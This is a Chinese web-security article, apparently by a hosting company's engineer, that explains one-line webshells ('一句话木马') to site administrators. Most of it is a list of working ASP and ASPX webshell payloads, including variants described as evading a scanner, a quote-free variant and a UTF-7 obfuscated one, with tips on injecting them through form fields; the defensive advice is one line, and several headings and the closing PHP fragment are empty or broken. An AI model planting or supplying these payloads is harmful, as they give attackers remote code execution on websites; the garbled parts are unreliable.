作为网站管理员或站长，不得不应对各种黑客入侵行为，万维景盛工程师今天向大家介绍认识一种常见的黑客木马文件——一句话木马。古人云：“知己知彼，百战不殆”。只有了解黑客的入侵工具和行为特征，才能更好地做好网站防护。一句话木马是一种基于B/S结构的简短脚本，通过这个脚本，执行POST来的任意参数语句，可以提交任意内容，黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息，达到注入非法信息等的目的。

这个程序把提交的数据当PHP语句执行，利用这个功能可以查看甚至修改你的数据库数据和文件。使用的方法可以随便编写一个HTML来完成，例如：

黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码：

<%execute request("value")%>

其中value是值，所以你可以更改自己的值，前面的request就是获取这个值

<%eval request("value")%>(现在比较多见的，而且字符少，对表单字数有限制的地方特别的实用)

当知道了数据库的URL，就可以利用本地一张网页进行连接得到Webshell。（不知道数据库也可以，只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。）

常用一句话木马

asp一句话木马：

　　 <%execute(request("value"))%>

　　php一句话木马：

　　aspx一句话木马：

　　<%@ Page Language="Jscript"%>

　　<%eval(Request.Item["value"])%>

其他一句话木马：

<%eval request("value")%>

　　<%execute request("value")%>

　　<%execute(request("value"))%>

　　<%If Request("value")<>"" Then Execute(Request("value"))%>

　　<%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>

　　<%@ Page Language="Jscript"%>

　　<%eval(Request.Item["value"],"unsafe");%>

　　可以躲过雷客图的一句话木马：

　　<% 　　set ms = server.CreateObject("MSScriptControl.ScriptControl.1") 　　ms.Language="VBScript" 　　ms.AddObject "Response", Response 　　ms.AddObject "request", request 　　ms.ExecuteStatement("ev"&"al(request(""value""))") 　　%>

　　不用'<,>'的asp一句话木马：

　　不用双引号的一句话木马：

　　<%eval request(chr(35))%>

UTF-7编码加密:

<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

PHP木马的防范方法实例：

php网页木马代码，大家可以看下自己的网站里面是不是有这样的代码，注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。

php网页木马

$v) $_POST[$k] = stripslashes($v);
?>